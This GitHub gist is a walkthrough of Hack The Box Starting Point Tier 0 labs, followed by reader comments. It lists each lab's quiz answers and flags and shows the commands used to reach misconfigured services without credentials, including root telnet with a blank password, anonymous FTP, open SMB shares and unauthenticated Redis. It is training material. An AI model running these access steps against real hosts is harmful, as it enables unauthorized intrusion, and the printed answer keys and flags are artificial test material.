Skip to content

Instantly share code, notes, and snippets.

@tboerger
Created November 14, 2022 13:43
Show Gist options
  • Save tboerger/2dcc14d019d34d401e4695ad6e209144 to your computer and use it in GitHub Desktop.
Save tboerger/2dcc14d019d34d401e4695ad6e209144 to your computer and use it in GitHub Desktop.
Hack The Box: Starting Point Tier 0

Meow

Questionnaire

What does the acronym VM stand for?
Virtual Machine
What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It's also known as a console or shell.
terminal
What service do we use to form our VPN connection into HTB labs?
openvpn
What is the abbreviated name for a 'tunnel interface' in the output of your VPN boot-up sequence output?
tun
What tool do we use to test our connection to the target with an ICMP echo request?
ping
What is the name of the most common tool for finding open ports on a target?
nmap
What service do we identify on port 23/tcp during our scans?
telnet
What username is able to log into the target over telnet with a blank password?
root
Submit root flag
b40abdfe23665f766f9c61ecba8a4c19

Commands

Scan

$ rustscan -a 10.129.43.238

PORT   STATE SERVICE REASON
23/tcp open  telnet  syn-ack

Telnet

$ telnet -l root 10.129.43.238

Trying 10.129.43.238...
Connected to 10.129.43.238.
Escape character is '^]'.
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

Fawn

Questionnaire

What does the 3-letter acronym FTP stand for?
File Transfer Protocol
Which port does the FTP service listen on usually?
21
What acronym is used for the secure version of FTP?
SFTP
What is the command we can use to send an ICMP echo request to test our connection to the target?
ping
From your scans, what version is FTP running on the target?
vsftpd 3.0.3
From your scans, what OS type is running on the target?
Unix
What is the command we need to run in order to display the 'ftp' client help menu?
ftp -h
What is username that is used over FTP when you want to log in without having an account?
anonymous
What is the response code we get for the FTP message 'Login successful'?
230
There are a couple of commands we can use to list the files and directories available on the FTP server. One is dir. What is the other that is a common way to list files on a Linux system.
ls
What is the command used to download the file we found on the FTP server?
get
Submit root flag
035db21c881520061c53e0536e44f815

Commands

Scan

$ rustscan -a 10.129.86.28 -- -sC

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.15.27
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status

File

$ ftp -p [email protected]
Connected to 10.129.86.28.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (10,129,86,28,155,118).
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.
ftp> get flag.txt
227 Entering Passive Mode (10,129,86,28,215,181).
150 Opening BINARY mode data connection for flag.txt (32 bytes).
226 Transfer complete.
32 bytes received in 0.000266 seconds (117 kbytes/s)
ftp> quit
221 Goodbye.

Dancing

Questionnaire

What does the 3-letter acronym SMB stand for?
Server Message Block
What port does SMB use to operate at?
445
What is the service name for port 445 that came up in our Nmap scan?
microsoft-ds
What is the 'flag' or 'switch' we can use with the SMB tool to 'list' the contents of the share?
-L
How many shares are there on Dancing?
4
What is the name of the share we are able to access in the end with a blank password?
WorkShares
What is the command we can use within the SMB shell to download the files we find?
get
Submit root flag
5f61c10dffbc77a704d76016a22f1664

Commands

Scan

$ rustscan -a 10.129.1.203

PORT      STATE SERVICE      REASON
135/tcp   open  msrpc        syn-ack
139/tcp   open  netbios-ssn  syn-ack
445/tcp   open  microsoft-ds syn-ack
5985/tcp  open  wsman        syn-ack
47001/tcp open  winrm        syn-ack

Shares

$ smbclient --no-pass -L 10.129.1.203

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	WorkShares      Disk

File

$ smbclient --no-pass //10.129.1.203/Workshares

smb: \> ls
  .                                   D        0  Mon Mar 29 10:22:01 2021
  ..                                  D        0  Mon Mar 29 10:22:01 2021
  Amy.J                               D        0  Mon Mar 29 11:08:24 2021
  James.P                             D        0  Thu Jun  3 10:38:03 2021

		5114111 blocks of size 4096. 1732425 blocks available
smb: \> cd James.P
smb: \James.P\> ls
  .                                   D        0  Thu Jun  3 10:38:03 2021
  ..                                  D        0  Thu Jun  3 10:38:03 2021
  flag.txt                            A       32  Mon Mar 29 11:26:57 2021

		5114111 blocks of size 4096. 1732424 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \James.P\> quit

Redeemer

Questionnaire

Which TCP port is open on the machine?
6379
Which service is running on the port that is open on the machine?
redis
What type of database is Redis? Choose from the following options: (i) In-memory Database, (ii) Traditional Database
In-memory Database
Which command-line utility is used to interact with the Redis server? Enter the program name you would enter into the terminal without any arguments.
redis-cli
Which flag is used with the Redis command-line utility to specify the hostname?
-h
Once connected to a Redis server, which command is used to obtain the information and statistics about the Redis server?
info
What is the version of the Redis server being used on the target machine?
5.0.7
Which command is used to select the desired database in Redis?
select
How many keys are present inside the database with index 0?
4
Which command is used to obtain all the keys in a database?
keys *
Submit root flag
03e1d2b376c37ab3f5319922053953eb

Commands

Scan

$ rustscan -a 10.129.70.165

PORT     STATE SERVICE REASON
6379/tcp open  redis   syn-ack

Version

$ redis-cli -h 10.129.70.165 info | grep redis_version

redis_version:5.0.7

Keys

$ redis-cli -h 10.129.70.165 -n 0 keys '*'

1) "numb"
2) "flag"
3) "temp"
4) "stor"

Flag

$ redis-cli -h 10.129.70.165 -n 0 get flag

"03e1d2b376c37ab3f5319922053953eb"

Explosion (VIP)

Preignition (VIP)

Mongod (VIP)

Synced (VIP)

Copy link

ghost commented Nov 30, 2023

Thanks a lot!

@tboerger
Copy link
Author

Totally forgot that I have posted that... You are welcome 😂

@umehabiba35
Copy link

This is amazing and very helpful tboerger. can you kindly tell me in deatil step by step how to find root flag and user flag on a machine plz.

@amos-techy
Copy link

This is awesome thanks so much for making me a lazy hacker. LOOOL!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment